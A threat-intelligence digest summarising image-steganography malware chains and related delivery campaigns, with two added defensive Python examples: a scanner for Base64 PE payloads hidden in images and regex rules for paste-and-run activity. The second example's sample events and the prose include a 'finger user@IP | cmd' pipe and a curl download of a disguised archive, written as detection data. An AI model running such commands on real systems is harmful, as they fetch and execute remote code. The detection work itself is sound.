Malware Delivery via Image-Based Payload Hiding and Reused Steganographic Media
Security researchers reported multiple malware delivery chains that hide or embed executable payloads inside image files to evade detection. Veracode analyzed a malicious typosquatted NPM package, buildrunner-dev, that uses a postinstall hook to run init.js, which downloads an obfuscated batch script (packageloader.bat) from a Codeberg repository. The batch script ultimately retrieves PNG images hosted on a free image service and extracts hidden data from RGB pixel values (steganography), leading to a loader with process hollowing, encrypted payload handling, AMSI bypass, and per-AV evasion logic, culminating in deployment of the Pulsar .NET RAT.
Separately, SANS ISC documented a phishing/malspam-style infection chain starting from an Excel attachment exploiting CVE-2017-11882 (Equation Editor), which downloads an HTA that launches PowerShell to fetch a PNG (optimized_MSI.png) containing a Base64-encoded .NET payload delimited by BaseStart- and -BaseEnd tags. The handler noted reuse of the same image across campaigns, used VirusTotal similarity searches to identify many related samples, and produced a YARA rule to track the technique. Kaspersky’s write-up on Arkanix Stealer describes a MaaS stealer ecosystem (C++ and Python variants, ChromElevator usage, and broad credential/crypto theft) but does not center on image-based payload hiding, making it a separate topic from the image-steganography delivery chains described by Veracode and SANS ISC.
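To make the SANS ISC observation concrete from the defender's side, here is an added example (not code from the SANS ISC handler or from the YARA rule they published) that scans image bytes for the `BaseStart-` / `-BaseEnd` delimiters, decodes whatever sits between them, and checks whether the result is a PE file. The tag strings come from the report; the PNG sample, the function names and the PE check are this example's own constructions.

```python
"""Detect a Base64-encoded PE hidden between BaseStart- and -BaseEnd tags.
The tags are from the SANS ISC write-up; the sample image bytes below are
constructed for this example and are not a real campaign artifact."""
import base64
import re
import struct

START_TAG = b"BaseStart-"
END_TAG = b"-BaseEnd"
_TAG_RE = re.compile(re.escape(START_TAG) + rb"(.*?)" + re.escape(END_TAG), re.DOTALL)


def extract_embedded_payloads(data: bytes) -> list:
    """Return every blob that decodes cleanly from between the delimiters."""
    blobs = []
    for m in _TAG_RE.finditer(data):
        b64 = re.sub(rb"\s+", b"", m.group(1))  # tolerate wrapped Base64
        try:
            blobs.append(base64.b64decode(b64, validate=True))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return blobs


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE check: 'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def scan_image(data: bytes) -> dict:
    """Summarise one file: delimiters present, decodable blobs, PE blobs."""
    payloads = extract_embedded_payloads(data)
    return {
        "has_delimiters": START_TAG in data and END_TAG in data,
        "payload_count": len(payloads),
        "pe_payloads": sum(1 for p in payloads if looks_like_pe(p)),
    }


# Constructed sample: PNG signature, filler, then a minimal fake PE stub
# (DOS header with e_lfanew -> 0x40, followed by the PE signature).
_FAKE_PE = bytearray(b"MZ" + b"\x00" * 0x3E)
struct.pack_into("<I", _FAKE_PE, 0x3C, 0x40)
_FAKE_PE += b"PE\x00\x00" + b"\x00" * 20
SAMPLE_PNG = (b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
              + START_TAG + base64.b64encode(bytes(_FAKE_PE)) + END_TAG + b"IEND")

if __name__ == "__main__":
    print(scan_image(SAMPLE_PNG))  # → {'has_delimiters': True, 'payload_count': 1, 'pe_payloads': 1}
```

Because the loader only needs the tags and the Base64 text, the check ignores PNG structure entirely and works on any file the markers were dropped into.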
Related Stories

Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
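As an added example (not from Red Canary's report), the following detection logic flags the three command-line patterns the Scarlet Goldfinch chain above is described with: `finger user@host` piped into `cmd`, a `curl` download saved under a `.pdf` name, and `tar -xf` run against a `.pdf`. The process-creation events are constructed for this example; only the `finger`, `curl` and `tar -xf` usage comes from the report, the rule names and regexes are this example's own.

```python
"""Flag paste-and-run command lines: finger|cmd, curl-to-.pdf, tar -xf on .pdf.
Sample events below are constructed, not real telemetry."""
import re

# Each rule: (name, regex applied to the full command line)
RULES = [
    ("finger_piped_to_cmd",
     re.compile(r"\bfinger(\.exe)?\s+\S+@\S+\s*\|\s*(cmd|powershell)\b", re.I)),
    ("curl_download_as_pdf",
     re.compile(r"\bcurl(\.exe)?\b.*\s(-o|--output)\s+\S+\.pdf\b", re.I)),
    ("tar_extract_pdf",
     re.compile(r"\btar(\.exe)?\s+(-xf|-x\s+-f|xf)\s+\S+\.pdf\b", re.I)),
]


def matched_rules(cmdline: str) -> list:
    """Names of every rule whose regex matches this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_events(lines) -> list:
    """Return (timestamp, cmdline, [rule names]) for each event with a hit.
    Assumed line format: '<timestamp> <command line>'."""
    hits = []
    for line in lines:
        ts, _, cmd = line.partition(" ")
        names = matched_rules(cmd)
        if names:
            hits.append((ts, cmd, names))
    return hits


# Constructed sample process-creation events (203.0.113.0/24 is documentation space).
SAMPLE_EVENTS = [
    "2025-01-10T09:14:02Z finger user@203.0.113.5 | cmd",
    "2025-01-10T09:14:05Z curl -s http://203.0.113.5/report.pdf -o C:\\Users\\Public\\report.pdf",
    "2025-01-10T09:14:07Z tar -xf C:\\Users\\Public\\report.pdf -C C:\\Users\\Public\\",
    "2025-01-10T09:20:00Z finger user@localhost",
    "2025-01-10T09:21:00Z curl -o page.html https://example.com/",
]

if __name__ == "__main__":
    for ts, cmd, names in scan_events(SAMPLE_EVENTS):
        print(ts, names, cmd)
```

The last two benign events show that a bare `finger` query or an ordinary `curl` download does not fire; it is the pipe into `cmd` and the archive-as-PDF naming that make the chain distinctive.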
1 month ago
Malware Delivery via Deceptive Distribution and Evasion Techniques
Threat researchers reported multiple active campaigns focused on **stealthy malware delivery** by abusing trusted execution paths and deceptive distribution. Trellix described attackers using **DLL side-loading** against a legitimate, signed `ahost.exe` binary associated with the *c-ares* ecosystem (commonly seen with GitKraken Desktop) by placing a malicious `libcares-2.dll` alongside the executable to trigger search-order hijacking and execute attacker code. The activity was linked to delivery of commodity malware families including **Agent Tesla, Formbook, Remcos RAT, Quasar RAT, DCRat, XWorm, Vidar Stealer, Lumma Stealer, CryptBot**, and others, with targeting observed across business functions (finance, procurement, supply chain, administration) and lures in multiple languages, suggesting regionally focused operations. Separately, Malwarebytes documented a **fake RustDesk download site** (`rustdesk[.]work`) that installs legitimate RustDesk while silently deploying a persistent backdoor framework (**Winos4.0**) via a trojanized installer (e.g., `rustdesk-1.4.4-x86_64.exe`), relying on user deception rather than exploiting a software vulnerability. Sucuri detailed a WordPress compromise where attackers modified `index.php` to perform **selective content injection/SEO cloaking**, using IP-verified logic with hardcoded **Google ASN CIDR ranges** to serve malicious content to Googlebot while showing normal content to human visitors and site owners—an evasion technique that can facilitate downstream malware distribution while reducing the chance of detection.
2 months ago
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
1 month ago